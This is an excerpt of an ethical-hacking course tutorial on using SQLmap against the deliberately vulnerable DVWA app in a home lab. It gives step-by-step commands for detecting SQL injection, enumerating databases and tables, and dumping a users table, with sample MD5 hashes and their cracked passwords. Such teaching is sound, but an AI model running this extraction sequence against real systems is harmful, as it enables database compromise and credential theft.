📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.

← KALI LINUX COURSE HUB
DAY 7 OF 180
TOOL: SQLMAP Tutorial

← Day 6: Nikto

Day 8: Wireshark →

🔐
Authorised targets only. All SQLmap commands target DVWA in your own isolated home lab. SQLmap generates high-volume HTTP traffic clearly visible in server logs and IDS. Never run it against systems you don’t own or lack explicit written authorisation to test. Lab: Ethical Hacking Lab Setup.

180-DAY KALI LINUX COURSE

Day 7 / 180 — 3.9%

✅ D1:Nmap

✅ D2:Netcat

✅ D3:Gobuster

✅ D4:Hydra

✅ D5:John

✅ D6:Nikto

▶ D7:SQLmap

D8:Wireshark

D9–180:···

Day 6 (Nikto) flagged a potential SQL injection endpoint. Day 7 teaches you to confirm it and pull every credential, every table, and every piece of data from the database in minutes. SQLmap automates what would take hours of manual UNION payload crafting — and on a confirmed-vulnerable DVWA endpoint, a single three-command sequence goes from zero to a full credential dump in under 90 seconds. Understanding what it is doing beneath the surface is what separates a professional who can adapt when automation fails from one who is lost without it, thats exactly what we will learn today in SQLMAP tutorial

Day 7 covers SQLmap Tutorial completely — installation, basic URL scanning, the full DVWA walkthrough, using Burp Suite request files (the professional method), every important flag, POST form testing, and the command patterns you will use in every authorised web application assessment.

📋 What You’ll Master in Day 7

What Is SQLmap & How It Works

Install & Verify

Basic URL Scan

Full DVWA Walkthrough

Burp Request File (-r) Method

All Important Flags Explained

POST Forms & Authentication

Reading SQLmap Output

Reference Card

What Is SQLmap & How It Works

SQLmap is an open-source automated SQL injection detection and exploitation tool. It works by sending crafted HTTP requests to a target parameter, analysing the database’s response behaviour to determine whether injection is possible, then systematically extracting the database schema and data using the confirmed injection channel.

It detects five injection types automatically: boolean-based blind (true/false responses differ), time-based blind (delays reveal data bit by bit), error-based (database errors leak data), UNION query (appends SELECT to extract data), and stacked queries (semicolon-separated statement injection). It supports MySQL, PostgreSQL, MSSQL, Oracle, SQLite, and 20+ other database systems.

📚 Manual first, always. The professional workflow is: (1) confirm injection manually with a single quote and a boolean condition in Burp Repeater, (2) use SQLmap for systematic extraction. Manual first prevents false positives. See: SQL Injection Tutorial Step-by-Step and DVWA Day 4: SQL Injection.

Install & Verify SQLmap on Kali Linux

Pre-installed on Kali Linux — verify:

sqlmap –version

1.8.#stable — https://sqlmap.org

Update to latest version: sqlmap –update

Install if missing: sudo apt install sqlmap -y

View all options: sqlmap -hh # full help (vs -h for short help)

Basic URL Scan — Your First SQLmap Commands

─── Basic GET parameter scan ────────────────────────────────────

sqlmap -u “http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” \

       –cookie=“PHPSESSID=abc123; security=low” –batch

SQLmap tests the ‘id’ parameter and reports injection type found

─── List all databases ────────────────────────────────────────── sqlmap -u “…?id=1&Submit=Submit” –cookie=“…” –dbs –batch

[] available databases [2]: [] dvwa [*] information_schema

Full DVWA Walkthrough — Zero to Credential Dump

The complete four-command sequence that takes you from detecting an injection to extracting usernames and password hashes. All commands target DVWA in your authorised home lab.

securityelites.com

Kali Linux — SQLmap Full DVWA Extraction (Authorised Home Lab)

STEP 1: Enumerate databases

└─$ sqlmap -r dvwa_sqli.txt –dbs –batch
[] dvwa
[] information_schema

STEP 2: List tables in dvwa

└─$ sqlmap -r dvwa_sqli.txt -D dvwa –tables –batch
[] guestbook
[] users

STEP 3: Dump users table

└─$ sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch

+—-+——-+———————————-+
| id | user | password (MD5) |
+—-+——-+———————————-+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | gordo | e99a18c428cb38d5f260853678922e03 |
| 3 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
+—-+——-+———————————-+
→ Crack with John the Ripper (Day 5): admin=password, gordo=abc123, pablo=letmein

SQLmap full DVWA extraction using -r Burp request file — three commands in sequence: –dbs (discover databases), -D dvwa –tables (list tables), -D dvwa -T users –dump (extract all rows). Result: three usernames and MD5 password hashes extracted in under 90 seconds. The hashes feed directly into John the Ripper (Day 5) for offline cracking. This is the complete database compromise path in an authorised lab assessment.

─── Complete 4-command extraction sequence ──────────────────────

1. Detect injection + enumerate databases sqlmap -r dvwa_sqli.txt –dbs –batch

2. List tables in target database sqlmap -r dvwa_sqli.txt -D dvwa –tables –batch

3. List columns in users table sqlmap -r dvwa_sqli.txt -D dvwa -T users –columns –batch

4. Dump the entire users table sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch

Burp Suite Request File (-r) — The Professional Method

---

📖 Read the complete guide on SecurityElites

This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →

---

This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.